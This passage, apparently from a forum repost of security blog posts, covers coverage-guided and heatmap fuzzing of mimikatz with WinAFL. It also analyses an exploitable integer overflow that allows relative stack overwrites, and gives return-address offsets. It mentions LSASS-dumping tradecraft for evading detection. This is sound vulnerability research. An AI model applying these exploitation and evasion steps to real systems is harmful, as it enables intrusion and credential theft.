a new set of samples by mutating existing samples in the corpus. The fuzzer spawns IE process which opens a harness HTML page. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe After the sample executes, it notifies the harness which notifies the fuzzer to stop collecting coverage. Coverage map is examined and if it contains unseen coverage, the corresponding sample is added to the corpus. Go to step 3 until all samples are executed or the IE process crashes Periodically minimize the corpus using the AFL’s cmin algorithm. Go to step 1. The following set of mutations was used to produce new samples from the existing ones: Adding new CSS rules Adding new properties to the existing CSS rules Adding new HTML elements Adding new properties to the existing HTML elements Adding new JavaScript lines. The new lines would be aware of the existing JavaScript variables and could thus reuse them. Unfortunately, while we did see a steady increase in the collected coverage over time while running the fuzzer, it did not result in any new crashes (i.e. crashes that would not be discovered using dumb fuzzing). It would appear more investigation is required in order to combine coverage information with DOM fuzzing in a meaningful way. Conclusion As stated before, DOM engines have been one of the largest sources of web browser bugs. While this type of bug are far from gone, most browsers show clear progress in this area. The results also highlight the importance of doing continuous security testing as bugs get introduced with new code and a relatively short period of development can significantly deteriorate a product’s security posture. The big question at the end is: Are we now at a stage where it is more worthwhile to look for security bugs manually than via fuzzing? Or do more targeted fuzzers need to be created instead of using generic DOM fuzzers to achieve better results? And if we are not there yet - will we be there soon (hopefully)? The answer certainly depends on the browser and the person in question. Instead of attempting to answer these questions myself, I would like to invite the security community to let us know their thoughts. Posted by Ben at 9:35 AM Sursa: https://googleprojectzero.blogspot.ro/2017/09/the-great-dom-fuzz-off-of-2017.html
-
HACK THE HACKER – FUZZING MIMIKATZ ON WINDOWS WITH WINAFL & HEATMAPS (0DAY) On 22. Sep In this blogpost, I want to explain two topics from a theoretical and practical point of view: How to fuzz windows binaries with source code available (this part is for developers) and How to deal with big input files (aka heatmap fuzzing) and crash analysis (for security consultants; more technical) Since this blog post got too long and I didn’t want to remove important theory, I marked background knowledge with grey color. Feel free to skip these sections if you are already familiar with this knowledge. If you are only interested in the exploitable mimikatz flaws you can jump to chapter “Practice: Analysis of the identified crashes“. I (René Freingruber from SEC Consult Vulnerability Lab) am going to give a talk at heise devSec (and IT-SECX and DefCamp) about fuzzing binaries for developers and therefore I wanted to test different approaches to fuzz windows applications where source code is available (the audience are most likely developers). To my knowledge there are several blog posts talking about fuzzing Linux applications with AFL or libfuzzer (just compile the application with afl-gcc instead of gcc or add some flags to clang), but there is no blog post explaining the concept and setup for Windows. This blog post tries to fill this gap. Fuzzing is a very important concept during development and therefore all developers should know how to do it correctly and that such a setup can be simple and fast! WHY I CHOSE MIMIKATZ AS FUZZING TARGET To demonstrate fuzzing I had to find a good target where source code is available. At the same time, I wanted to learn more about the internals of the application by reading the source code. Therefore, my decision fell on mimikatz because it’s an extremely useful tool for security consultants (and hackers) and I always wanted to understand how mimikatz internally works. Mimikatz is a powerful hacker tool for Windows which can be used to extract plaintext credentials, hashes of currently logged on users, machine certificates and many other things. Moreover, mimikatz contains over 261 000 lines of code, must parse many different data structures and is therefore likely to be affected by vulnerabilities itself. At this point I also want to say that penetration testing would not be the same without the amazing work of Benjamin Delpy gentilkiwi, the author of mimikatz. The next thing I need is a good attack vector. Why should I search for vulnerabilities if there is no real attack vector which can trigger the vulnerability? Mimikatz can be used to dump cleartext credentials and hashes of currently logged in users from the LSASS process. But if there exists a bug in the parsing code of mimikatz, what exactly could I achieve with this? I could just exploit myself because mimikatz gets executed on the same system. Well, not always. As it turns out, well-educated security consultants and hackers do not directly invoke mimikatz on the owned system. Instead, it’s nowadays widespread practice to create a minidump of the LSASS process on the owned system, download it and invoke mimikatz locally (on the attacker system). Why do we do this? Because dropping mimikatz on the owned system could trigger all kind of alerts (AntiVirus, Application Whitelisting, Windows Logs, …) and because we want to stay under the radar, we don’t want these alerts. Instead, we can use Microsoft signed binaries to dump the LSASS process (e.g.: Task manager, procdump.exe, msbuild.exe or sqldumper.exe). Now we have a good attack vector! We can create a honeypot, inject some malicious stuff into our own LSASS process, wait until a hacker owns it, dumps the LSASS process and invokes mimikatz on his own system reading our manipulated memory dump file and watch reverse shells coming in! This and similar attack vectors can be interesting features in the future for deception technologies such as CyberTrap (https://www.cybertrap.com/). To be fair, exploiting this scenario can be quite difficult because mimikatz is compiled with protections, such as ASLR and DEP, and exploitation of such a client-side application is extremely challenging (we don’t have the luxury of a remote memory leak nor of scripting possibilities such as with browsers or PDF readers). However, such client-side scriptless exploits are not impossible, for example see https://scarybeastsecurity.blogspot.co.at/2016/11/0day-exploit-advancing-exploitation.html. To my surprise, mimikatz contained a very powerful vulnerability which allows us to bypass ASLR (and DEP). THEORY: FUZZING WINDOWS BINARIES We don’t want to write a mimikatz-specific fuzzer (with knowledge about the parsing structures, implemented checks and so on), instead, we want to use something which is called “coverage-guided fuzzing” (or feedback-based fuzzing). This means we want to extract code coverage information during fuzzing. If one of our mutated input files (the memory dump files) generate more code coverage in mimikatz, we want to add it to our fuzzing queue and fuzz this input later as well. That means we start with one dump file and the fuzzer identifies different code paths itself (ideally all) for us and therefore “learn” all the internal parsing logic autonomously! This also means that we only have to write a fuzzer one time and can use it against nearly all kinds of applications! Luckily for us, we don’t even have to write such a fuzzer because someone else already did an excellent job! Currently the most commonly used fuzzer is called AFL (American fuzzy lop) and implements exactly this idea. It turned out that AFL is extremely effective in identifying vulnerabilities. In my opinion, this is because of four major characteristics of AFL: It is extremely fast. It extracts edge coverage (with hit count) and not only code coverage which simplified means that we try to maximize executed “paths” and not “code” (E.g. if we have an IF statement, code coverage would put the input file which executes the code inside the IF into the queue. Edge coverage on the other side would put one entry with, and one entry without the IF body-code into the queue.). Because of 1) it can implement deterministic mutation (do every operation on every byte/bit of the input). More on this later when talking about heatmap fuzzing. It’s extremely simple to use. Fuzzing can be started within several minutes! The big question is now: How does AFL extract the code/edge coverage information? The answer depends on the configured mode of AFL. The default option is to “hack” generated object files from gcc and insert at all possible code locations instrumentation code. There is also a LLVM mode where a LLVM compiler pass is used to insert the instrumentation. And then there is a qemu mode if source code is not available which emulates the binary and adds instrumentation via qemu. There are several forks which extend AFL with other instrumentation possibilities. For example, hardware features can also be used to extract code coverage (WinAFL-IntelPT, kAFL). Another idea is to use dynamic instrumentation frameworks such as PIN or DynamoRio (e.g. WinAFL). These frameworks can dynamically instrument (during runtime) the target binary which means that a dispatcher loads the next instructions which should be executed and adds additional instrumentation code before (and after) them. All that requires dynamic relocation of the instructions while being completely transparent to the target application. This is quite complicated but the framework hides all that logic from the user. Obviously, this approach is not fast (but works on Windows and has many cool features for the future!). When source code is available, I thought that there should be the same possibility as AFL does on Linux (with GCC). My first attempt was to use “libfuzzer” on Windows. Libfuzzer is a fuzzer like AFL but it acts on function level fuzzing and is therefore more suitable for developers. AFL fuzzes full binaries per default but can also be started in a persistent mode where it fuzzes on function level. Libfuzzer uses the feature “Source-based code coverage” from the LLVM clang compiler which is exactly what I wanted to use for coverage-information on Windows. After some initial errors I could compile mimikatz with LLVM on Windows. When adding the flags for “source-based code coverage” I got again some errors which can be fixed by adding the required libraries to the linker include paths. However, this flag added the same functions to all object files which resulted in linker errors. The only way I could solve this was to merge all .c files into one huge file. Since this approach was more a pain than anything else, I didn’t pursue it further for the talk. Note that using LLVM for application analysis on Windows could be a very interesting approach in the future! The next thing I tested was WinAFL in syzygy mode and this was exactly what I was looking for! For a more detailed description of syzygy see https://doar-e.github.io/blog/2017/08/05/binary-rewriting-with-syzygy/. At this point I want to thank Ivan Fratric (developer of WinAFL) and Axel 0vercl0k Souchet (developer of the syzygy mode) for their amazing job and of course Michal Zalewski for AFL! PRACTICE: FUZZING WINDOWS BINARIES You can download WinAFL from here: https://github.com/ivanfratric/winafl All we must do is include the header and add the code: While(__afl_persistent_loop()) { // code to fuzz } to the project which we want to fuzz and compile a 32-bit application with the /PROFILE linker flag (Visual Studio -> project properties -> Linker -> Advanced -> Profile). For mimikatz I removed the command prompt code from the wmain function (inside mimikatz.c) and just called kuhl_m_sekurlsa_all(argc,argc) because I wanted to directly dump the hashes/passwords from the minidump (issue the sekurlsa::logonpasswords command at program invocation). Since mimikatz would extract this information per default from the LSASS process I added a line inside kuhl_m_sekurlsa_all() to load the dump instead. Moreover, I added the persistent loop inside this function. Here is how my new kuhl_m_sekurlsa_all() function looks: NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t *argv[]) { While(__afl_persistent_loop()) { kuhl_m_sekurlsa_reset(); // sekurlsa::minidump command pMinidumpName = argv[1]; // sekurlsa::minidump command kuhl_m_sekurlsa_getLogonData(lsassPackages, ARRAYSIZE(lsassPackages); // sekurlsa::logonpasswords command } Return NT_SUCCESS; } Hint: Do not use the above code during fuzzing. I added a subtle flaw, which I’m going to explain later. Can you already spot it? After compilation, we can start the binary and see some additional messages: The next step is to instrument the code. For this to work we must register “msdia140.dll”. This can be done via the command: Regsvr32 C:\path\to\msdia140.dll Then we can call the downloaded instrument.exe binary with the generated mimikatz.exe and mimikatz.pdb file to add the instrumentation: We can start the instrumented binary and see the adapted status message: Now we can generate a minidump file for mimikatz (on a Windows 7 x86 test system I used task manager to dump the LSASS process), put it into the input directory and start fuzzing: As we can see, we have a file size problem! THEORY: FUZZING AND THE INPUT FILE SIZE PROBLEM We can see that AFL restricts input files to a maximum size of 1 MB. Why? Recall, that AFL is doing deterministic fuzzing before switching to random fuzzing for each queue input. That means that it is doing specific bit and byte flips/additions/removals/… for every (!) byte/bit in the input! This includes several strategies like bitflip 1/1, bitflip 2/1, …, arith 8/8, arith 16/8 and so on. For example, bitflip 1/1 means that AFL flips 1 bit per execution and then walks forward 1 bit to flip the next bit. Whereas 2/1 means that 2 bits are flipped and the step length is 1 bit. Arith 16/8 means that the step is 8 and that AFL tries to add interesting values to a value treated as 16-bit integer. And there are several more such deterministic fuzzing strategies. All these strategies have in common that the number of required application executions depend on the file size! Let’s just assume that AFL only (!) does the bitflip 1/1 deterministic strategy. This means that we must execute the target application exactly input-filesize (bit) number of times. WinAFL is doing in-memory fuzzing which means that we don’t have to start the application every time, but let’s forget this for now so that our discussion does not get too complicated. Let’s say that our input binary has a size of 10 kB. That are 81920 required executions for the deterministic stage (only for bitflip 1/1)! AFL conducts many more deterministic strategies. For AFL on Linux this is not very huge, it’s not uncommon to get execution speeds of 1000 – 8000 executions / second (because of the fork-server, persistent-mode, …) per core. This fast execution speed together with deterministic fuzzing (and edge coverage) made AFL so successful. So, if we have 16 cores we can easily do this strategy for one input file within a second. Now let’s assume that our input has a size of 1 MB (AFL limit), which means 8 388 608 required executions for the bitflip 1/1 and that our target application is a little bit slower because it’s bigger and running on Windows (200 exec / sec) and that we just have one core available for fuzzing. Then we need 11,5 hours only to finish the bitflip 1/1 for one input entry! Recall that we must conduct this deterministic stage for every new queue entry (every time we identify new coverage, we must do this again! It’s not uncommon that the queue grows up to several thousand inputs). And if we consider all the other deterministic operations which must be performed, the situation becomes even worse. And in our case the input (memory dump) has a size of 27 MB! This would be 216 036 224 required executions only for bitflip 1/1. AFL detects this and directly aborts because this would just take too long (and AFL would never find vulnerabilities because it’s stuck inside deterministic fuzzing). Of course, we can tell AFL to skip deterministic fuzzing, but that would not be very good because we still have to find the special byte/bit flip which triggers the vulnerability. And the likelihood for this in such a big input file is not very high…. Here is a cite from Michal Zalewski (author of AFL) from the perf_tips.txt document: To illustrate, let’s say that you’re randomly flipping bits in a file, one bit at a time. Let’s assume that if you flip bit #47, you will hit a security bug; flipping any other bit just results in an invalid document. Now, if your starting test case is 100 bytes long, you will have a 71% chance of triggering the bug within the first 1,000 execs – not bad! But if the test case is 1 kB long, the probability that we will randomly hit the right pattern in the same timeframe goes down to 11%. And if it has 10 kB of non-essential cruft, the odds plunge to 1%. The key learning is that input file size is very important during fuzzing! At least as important as plain execution speed of the fuzzer! There are tools and scripts shipped with AFL (cmin/tmin) to minimize the number of input files and the file size. However, I don’t want to talk about them in this blog post. They shrink files via a fuzzing attempt and since the problem is NP-hard they use heuristics. Tmin is also very slow (execution time depends on the file size…) and often leads to problems with files containing offsets (like our dump file) and checksums. Another idea could be to start WinAFL with an empty input file. However, memory dumps are quite complex and I don’t want to “waste” time while WinAFL identifies the format. And here is where heatmaps come into play. PRACTICE: FUZZING AND HEATMAPS My first attempt to minimize the input file was to read the source code of mimikatz and understand how it finds the important memory regions (containing the plaintext passwords and hashes) in the memory dump. I assumed some kind of pattern-search, however, mimikatz parses and uses lots of structures and I quickly discarded the idea of manually creating a smaller input binary by understanding mimikatz. During fuzzing we also don’t want to understand the application to write a specific fuzzer, instead we want that the fuzzer learns everything itself. If we could somehow give the fuzzer the same ability to detect the “important input bytes”… During reading the code I identified something interesting. Mimikatz loads the memory dump via kernel32!MapViewOfFile(). After that it reads nearly all required information from there (sometimes it also copies it via kull_m_minidump_copy, but let’s not get too complicated for the moment). If we can log all memory access attempts to this memory region, we can easily reduce the number of required executions drastically! If mimikatz does not touch a specific memory region, why should we even fuzz the bytes there? Here is a heat map which I generated based on memory read operations from mimikatz on my 27 MB input file (generated via a plotly python script): The black area is never read by mimikatz. The brighter the area, the more memory read operations accessed this region. The start of the file is located at the left bottom of the picture. I print 1000 bytes per line (from left to right), then go one line up and print the next 1000 bytes and so on. At this zoom level, we do not see access attempts to the start (header) of the memory dump. However, this is only because the file size is 27 MB and therefore the smaller red/yellow/white dots are not visible. But we can zoom in: The most important message from the above pictures: We do not have to fuzz the bytes from the black area! But we can even do better, we can start fuzzing the white bytes (many read attempts, like offset 0xaa00 which gets read several thousand times), then continue with yellow bytes (e.g.: offset 0x08 is read several hundred times) and then red areas (which are only read 1-5 times). This itself is not a perfect approach (more read attempts also mean that the likelihood that the input becomes invalid gets higher and therefore it’s maybe not the best idea to start with white areas but since we must do the full deterministic step it basically does not matter with which offsets we start; Hint: A better strategy is to also consider the triggering read-instruction address together with the hitcounts). You are maybe wondering how I extracted the memory-read information. For mimikatz I just used a stupid PoC debugger script, however, I’m currently developing a more sophisticated script with the use of dynamic instrumentation frameworks which can extract such information from any application. The use of a debugger script is “stupid” because it’s very slow and does not work for every application. However, for mimikatz it worked fine because mimikatz reads most of the time from the region which is mapped via MapViewOfFile(). My WinAppDbg script is very simple, I just use the Api-Hooking mechanism of WinAppDbg to hook the post-routine of MapViewOfFile. The return value contains the memory address where the input memory dump is loaded. I placed a memory breakpoint on it and at every breakpoint hit I just log the relative offset and increment the hit counter. You can also extend this script to become more complex (e.g.: hook kull_m_memory_search() or kull_m_minidump_copy(). For reference, here is the script: We start mimikatz via the debugger, as soon as mimikatz finishes (debug.loop() returns), we just sort the offsets based on the hit counts and dump them to a log file. This is the code which hooks MapViewOfFile to obtain the base address of our input in-memory. This code also adds the memory breakpoint (watch_buffer() method) and invokes memory_breakpoint_callback every time an instruction reads from our input. Hint: WinAppDbg has a bug inside watch_buffer() which does not return the bw variable. If the script should be extended (e.g. to disable the memory breakpoint for search-functions), the WinAppDbg source must be modified to return the “bw” variable in the watch_buffer() function. All left is the callback function: I used capstone to disassemble the triggering instruction to obtain the size of the read operation to update the offsets correctly. As you can see, there is no magic involved and the script is really simple (at least this one which only works with mimikatz). The downside of the debugger memory breakpoint approach is that it is extremely slow. On my test system, this script executes approximately 30 minutes to execute mimikatz one time which is really slow (mimikatz without the script executes in under 1 second). However, we only have to do this once. Another down-side is that it does not work for all applications because typically applications copy input-bytes to other buffers and access them there. A more general approach is to write such a script with a dynamic instrumentation framework which is also much faster (on which I’m currently working on). Developing such a script is much harder because we have to use shadow memory for taint tracking, follow copies of tainted memory (this taint propagation is a complex part because it requires correct semantic understanding of the x86 instruction set) but store at the same time which byte depends on which input byte and this should be as fast as possible (for fuzzing) and does not consume too much memory (so it’s useable for big and complex applications like Adobe Reader or web browsers). Please note that there are some similiar solutions, most notable TaintScope (however, no source code or tool public available and it was just a PoC) or VUzzer (based on DataTracker/libdft which themself are based on PIN) and some other frameworks such as Triton (based on PIN) or Panda (based on Qemu) can also do taint analysis. The problem with these tools is that either source code and the tool is not public available, or it is very slow or it does not work on Windows or it does not propagate the file offset information (just marks data is tainted or not tainted) or they are written with PIN which itself is slower than DynamoRio. I’m developing my own tool here to fulfil the above mentioned conditions so that it is useful during fuzzing (works on Windows and Linux, is as fast as possible and does not consume too much memory for huge applications). Please also bear in mind that AFL ships with Tmin, which also tries to reduce the input file size. However, it does this via a fuzzy approach which is very slow (and can’t handle checksums and file offsets so well). We can also verify that the black bytes don’t matter by just removing (zeroing them out) from the input file: The above figure shows that the output of both files is exactly the same, therefore the black bytes really don’t matter. Now we can start fuzzing with a much smaller input file – only 91KB instead of 27MB! PRACTICE: FUZZING RESULTS / READING THE AFL STATUS SCREEN I first started a simple fuzzer (not WinAFL) because I first had to modify the WinAFL code to only fuzz the identified bytes. I recommend to start fuzzing as soon as possible with a simple fuzzer and while it is running work on a better version of the fuzzer. My first fuzzer was a 50 LoC python script which flipped bytes, invoked mimikatz over WinDbg and parsed the output to detect crashes. I started 8 parallel fuzzing jobs with this fuzzer on my 12 core home system (4 cores for private stuff). Three days later I had 28 unique crashes identified by WinDbg. My analysis scripts reduced them to 4 unique bugs in code (the 28 crashes are just variations of the same 4 bugs in the code). Execution speed was approximately 2 exec/sec per job, therefore 16 exec/sec in total on all cores (which is really slow). The first exploitable bug from the next chapter was found after 3 hours, the second exploitable bug was not found at all with this approach. I also modified WinAFL to fuzz only the heatmap bytes. My first approach was to use the “post_handler” which can be used for test-case post-processing (e.g. fixing checksums, however, it’s better to remove the checksum verification code from the target application). Since this handler is not called for dry-runs (the first executions from AFL) this will not work. Instead, write_to_testcase() can be modified. Inside the main function I copy the full memory dump to a heap buffer. In the input directory I stored a file containing only the heatmap bytes and therefore the file size is much smaller like 91KB or 3KB. Next I added code to write_to_testcase where I copy all bytes from the input file over the heap buffer at the correct positions. Therefore, AFL only sees the small files but passes the correct memory dumps to mimikatz. This approach has a little drawback though. As soon as one queue entry has a different size, fuzzing could become ineffective, but for this PoC it was enough. Later I’m going to invoke the heatmap calculation for every queue entry if a heuristic detects this as more efficient. Please also bear in mind that AFL and WinAFL write every testcase to disk. This means we have to write a 27 MB file per execution (also per in-memory execution like a simple bit flip!!). From performance perspective it would be way better if we modify the testcase inside the target application in-memory (we already do in-memory fuzzing and therefore this is possible). Then we can also skip all the process-switches from WinAFL to the target application and back and then we really get the benefit of in-memory fuzzing! We can do this by injecting the AFL code (or even python code… into the target application, an area on which I’m also currently working on. Here is a screenshot of my WinAFL output (running on a RAMDisk): Look at the different stats of the fuzzer. What do you see? Is this type of fuzzing good or not? Should we stop or continue? Here is the same screenshot with some colored boxes: First the good thing: We already identified 16 unique crashes and a total of 137 unique paths (inputs which result in unique coverage; see the green area). Now the bad: Fuzzing speed is only 13 exec / sec (blue) which is extremly slow for AFL (but much faster than the self-written fuzzer which had 2 exec/sec per core). And now the really bad stuff: We are running for 14,5 hours and it didn’t finish the bitflip 1/1 stage yet for the first input file (and 136 others are in queue). You can see this in the red area because we just finished 97% of this stage. And after that 2/1 and 4/1 must be executed, then byte flips, arithmetics and so on. So we can see that continuing will not be very efficient. For demonstration I kept the fuzzer running, but modified my WinAppDbg script to filter better and started a new fuzzing job. The new WinAppDbg script reduced the number of “hot bytes” to 3KB (first we had 27 MB, then we had 91KB and now we just have 3KB to fuzz). This was possible because the new script does not count hits from search or copy functions, but also log access attempts from copied memory regions. This WinAppDbg script was approximatly 800 LoC (because I have to follow copies which go to heap and stack variables and I have to disable logging when the variables are freed). Here is a screenshot of the above job (with the “big” 91KB input files) after 2 days and 7 hours: We can see that the fuzzer finished bitflip 1/1 and 2/1 and is now inside 4/1 (with 98% finished). You can also see that the bitflip 1/1 strategy required 737k executions and 159 of these 737k executions resulted in new coverage (or crashes). Same for 2/1 where the stats are 29/737k. And we found 22 unique crashes in 2 days and 7 hours. And now the fuzzing of the smaller 3KB files after 2 hours: We can see that we already have 30 unique crashes after 2 hours! (Compare this with only 22 crashes after 2 days and 7 hours with the 91KB file!) We can also see that for example the bitflip 1/1 stage only required 17.9k executions (instead of 737k) because of the reduced input file size. Moreover, we can see that we found 245 unique paths and this with just 103k total executions (compared to 184 unique paths with 2.17 million executions from the 91KB test input). And now consider how long it would have taken us to fuzz the full 27MB file (!!) and what results we would have seen after some days of fuzzing. Now you should understand the importance of the input file size. Here is one more demonstration of the different input file sizes. The following animated image (created via Veles https://github.com/wapiflapi/veles) shows a visualization of the 27 MB original minidump file: And now the 27 MB minidump file where all unimportant (not read) bytes are replaced with 0x00 so we only see the 3 KB bytes which we fuzz with WinAFL; you maybe have to zoom in to see them. Look at the intersection of the 3 coordinate axes. However, in my opinion even the 3KB fuzzing job is too slow / inefficient. If we can start the job on multiple cores and let it run over one or two weeks, we should get into deeper levels and the result should be OK. But why are we even so slow? Why do we only have an execution speed of 13 or 16 exec / sec? Later queue entries will result in faster execution speeds because mimikatz will not execute the full code because the inputs trigger error-conditions (which result in execution speeds like 60 exec / sec). But on Linux we often deal with execution speeds of several thousand executions per second. A major point is that we have to load and search a 27MB file with every execution, so reducing this file size could really be a good idea (but requires lots of manual work). On the other hand, we can compare the execution speeds of different setups: Execution speed with WinAFL in syzygy mode: ~13 exec / sec Native execution speed without WinAFL and without instrumentation (in-memory): ~335 exec / sec Execution without WinAFL but with instrumented (syzygy) binary: ~50 exec / sec Execution of native binary (Instrumentation via DynamoRio drcov): ~163 exec / sec So we can see that syzygy instrumentation results in a slow-down factor of approximatly 6. And syzygy+WinAFL a factor of approximatly 25. This is mainly because of the process switches and file writes / reads because we are not doing full in-memory fuzzing, but there is also another big problem! We can see that instrumentation via DynamoRio is faster than syzygy (163 exec/sec vs. 50 exec/sec) and we can also start WinAFL with the DynamoRio mode (which does not require source code at all). If we do this, we get an execution speed of 0,05 – 2 exec/sec with WinAFL. At this point you should recognize that something is not working correctly because DynamoRio mode should be much faster! The reason can be found in our modification of the kull_m_sekurlsa_all() function. I added the two code lines kuhl_m_sekurlsa_reset() and pMinidumpName = argv[1] at the start because this is exactly what the “sekurlsa::minidump” command is doing. What I wanted to achieve is to immediatly execute the “sekurlsa::minidump” command and after that the “sekurlsa::logonpasswords” command and that’s why I used this sequence of code calls. However, this is a huge problem because we exit the function (DynamoRio mode) or the __afl_persistent_loop (syzygy mode) with a state where the input file is still open! This is because we call the kuhl_m_sekurlsa_reset() function at the start of the function and not at the end! That means that we only execute one “execution” in-memory, then WinAFL tries to modify the input file, detects that the file is still open and can’t be written to and then terminates the running process (via TerminateProcess from afl-fuzz.c:2186 in syzygy mode or nudges in DynamoRio mode from afl-fuzz.c:2195) to write to the file. Therefore, we do not do real in-memory fuzzing because we execute the application one time and then the application must be closed and restarted to write the next test case. That’s why the DynamoRio mode is so slow because the application must be started again for every testcase which means the application must be instrumented again and again (DynamoRio is a dynamic instrumentation framework). And because syzygy instrumented statically it’s not affected so heavily by this flaw (it still has to restart the application, but does not have to instrument again). Let’s fix the problem by reordering kuhl_m_sekurlsa_reset() to the end of the function: NTSTATUS kuhl_m_sekurlsa_all(int argc, wchar_t *argv[]) { While(__afl_persistent_loop()) { pMinidumpName = argv[1]; kuhl_m_sekurlsa_getLogonData(lsassPackages, ARRAYSIZE(lsassPackages); kuhl_m_sekurlsa_reset(); } Return NT_SUCCESS; } If we execute this, we still face the same problem. The reason is a bug inside mimikatz in the kuhl_m_sekurlsa_reset() function. Mimikatz opens the input file via three calls: CreateFile CreateFileMapping MapViewOfFile Therefore, we have to close all these three handles / mappings. However, mimikatz fails at closing the CreateFile handle. Here is the important code from kuhl_m_sekurlsa_reset() case KULL_M_MEMORY_TYPE_PROCESS_DMP: toClose = cLsass.hLsassMem->pHandleProcessDmp->hMinidump; break; ... } cLsass.hLsassMem = kull_m_memory_close(cLsass.hLsassMem); CloseHandle(toClose); Kull_m_memory_close() correctly closes the file mapping, but the last CloseHandle(toClose) call should close the handle received from CreateFile. However, toClose stores a heap address from (kull_m_minidump_open()): *hMinidump = (PKULL_M_MINIDUMP_HANDLE) LocalAlloc(LPTR, sizeof(KULL_M_MINIDUMP_HANDLE)); That means the code calls CloseHandle on a heap address and never calls CloseHandle on the original file handle (which gets never stored). After fixing this issue it starts to work and WinAFL gets 30-50 exec / sec! However, these executions are very inconsistent, sometimes drop down to under 1 execution per second (when the application must be restarted like after crashes). Because of this we got overall better fuzzing performance with the syzygy mode (which now has a speed of ~25 exec / sec) which also uses edge coverage. Screenshot of WinAFL DynamoRio mode (please bear in mind that the default mode is basic block coverage and not edge coverage with DynamoRio): Screenshot of WinAFL syzygy mode: Even if DynamoRio mode has a higher execution speed (29.91 exec / sec vs. 24.02 exec / sec) it’s in total slower because the execution speed is inconsistent. We can see this because DynamoRio mode is running since 25 minutes and just got total executions of 13.9k and syzygy mode just runs for 13 minutes but already got 16.6k executions. We can see that currently it’s more efficent to fuzz with syzygy mode if source code is available (especially if the target application crashes very often). And also very important: We had a bug in the code which slowed down the fuzzing process (at least by a factor of 2) and we didn’t see it during syzygy fuzzing! (A status screen entry with in-memory executions vs application restarts would be a great feature!) Please also note that the WinAFL documentation explicitly mentions this in the “How to select a target function” chapter: Close the input file. This is important because if the input file is not closed WinAFL won’t be able to rewrite it. Return normally (So that WinAFL can “catch” this return and redirect execution. “returning” via ExitProcess() and such won’t work) The second point is also very important. If an error condition triggers code which calls ExitProcess during fuzzing, we also end up starting the application again and again (and do not get the benefit of in-memory fuzzing). This is no problem with mimikatz. However, mimikatz crashes very often (e.g. 1697 times out of 16600 executions) and with every crash we have to restart the application. This mainly affects the performance of the DynamoRio mode because of the dynamic instrumentation and then it’s better to use the syzygy mode. Please also note that we can “fix” this by storing the stack pointer in the pre-fuzzing-handler of DynamoRio, implementing a crash handler where we restore the stack and instruction pointer, free the file mappings and handles and just continue fuzzing as if nothing had happend. Memory leaks can also be handled by hooking and replacing the heap implementation to free all allocations from the fuzzing-loop. Only global variables could become a probem, but this discussion goes too far here. At the end I started a fuzzing job with syzygy mode, one master (deterministic fuzzing) and 7 slaves (non-deterministic fuzzing) and let it run for 3 days (plus one day with page heap). In total I identified ~130 unique AFL crash signatures, which can be reduced to 42 unique WinDbg crash signatures. Most of them are not security-relevant, however, two crashes are critical. PRACTICE: ANALYSIS OF THE IDENTIFIED CRASHES Vulnerability 1: Arbitrary partial relative stack overwrites In this chapter I only want to describe the two critical crashes in depth. After fuzzing I had several unique crashes (based on the callstack of the crash) which I sorted with a simple self-written heuristic. From this list of crashes I took the first one (the one where I thought it’s the most likely to be exploitable) and analysed it. Here are the exact steps: This is the code with the vulnerability: The variable “myDir” is completly under our control. myDir points into our memory dump, we can therefore control all content of this struct. You maybe want to find the problem yourself before continuing, here are some hints: The argument length is always 0x40 (64) which is exactly the length of the destination argument buffer The argument source is also under our full control Obviously we want to reach RtlCopyMemory() from line 29 with some malicious arguments Now try to think how we can exploit this. My thoughts Step-by-Step: I want to reach line 29 (RtlCopyMemory() and therefore the IF statement from line 9-13 must be true. We can exploit the situation if “lengthToRead” (size argument) from the RtlCopyMemory call is bigger than 0x40 or if offsetToWrite is bigger than 0x40. The second case would be better for us because such relative writes are extremely powerful (e.g. just partially overwriting return addresses to bypass ASLR or to skip stack cookies and so on). So I decided to try exactly this, somehow control “offsetToWrite” which is only set in line 18 and 23. Line 23 is bad because it sets it to zero, so we take line 18. Since we want to come to line 18, the IF statement from line 15 must become true. First condition: Source < memory64→StartOfMemory This is no problem because we control both values completely. So far, so simple. Now lets check the first IF statement (line 9-13). One of the three conditions (line 10, 11 or 12) must evaluate to true. Lets focus on line 12 because from the IF from line 15 we know that Source < memory64→StartOfMemory must be true which is exactly what the first check is here for. So this one is true. That means we only have to ensure the second check: Second condition: Source + Length > (memory64→StartOfMemoryRange + memory64→DataSize) I leave this condition for one moment and think about line 25-27. What I want in RtlCopyMemory is to get as much control as possible. That means I want to control the target address (if possible, relative to an address to deal with ASLR), the source address to point into my own buffer and the size – that would really be great. The size is exactly lengthToRead and this variable can be set via line 25 and 27. 25 would be a bad choice because Length is fixed and offsetToWrite is already “used” to control the target address. So we must come to line 27. OffsetToRead is always zero because of line 17 and therefore memory64→DataSize completly controls lengthToRead. Now we can fix the next value and say that we want memory64→DataSize to be always 1 (to make 1-byte partial overwrites; or we set it to 4 / 8 to control full addresses). Now we are ready and take the second condition and fill in the known values. What we get is: Second condition: Source + 0x40 > (memory64→StartOfMemoryRange + 1) This check (together with the first condition) is exactly the check which should ensure that dataSize (the number of bytes which we write) is within the size of the buffer (0x40). However, we can force an integer overflow :). We can just set memory64→StartOfMemoryRange to 0xffffffffffffffff and therefore we survive the check because after adding one to it we get zero and that means Source + 0x40 is always bigger than zero (If we don’t overflow source+0x40). At the same time we survive the first condition because source will be smaller than 0xffffffffffffffff. Now we can also control offsetToWrite via line 18: offsetToWrite = 0xffffffffffffffff – source You might think that we can’t fully control offsetToWrite because the source variable is on x86 mimikatz just 32-bit (and the 0xffff… is 64-bit), however, because of integer truncation the upper 32-bit will be removed and therefore we can really address any byte in the address space relative to the destination buffer (on x64 mimikatz it’s 64-bit and therefore it’s also no problem). This is an extremely powerful primitive! We can overwrite bytes on the stack via relative offsets (ASLR is no obstacle here), we have full control over the size of the write-operation and full control over the values! The code can also be triggered multiple times (loop at line 7 is not useful because the destination pointer is not incremented) via loops which call this function (with some limitations). The next question is what offset do we use? Since we write relative to a stack variable we are going to target a return address. The destination variable is passed as argument inside the kull_m_process_ntheaders() function and this is exactly where we place a breakpoint on the first kull_m_memory_copy() call. Then we can extract the “destination” argument address and the address where the return address is stored and subtract them. What we get is the required offset to overwrite the return address. For reference, here are the offsets which I used for my dump file (dump files from other operating systems require very likely different offsets). Offset 0x6B4 stores the “source” variable. I use 0xffffff9c here because this is exactly the correct offset from “destination” to “return address” on the current release version of mimikatz (mimikatz 2.1.1 from Aug 13 2017; However, this offset should also work for older versions!). Offset 0xF0 stores the “myDir” struct content. The first 8 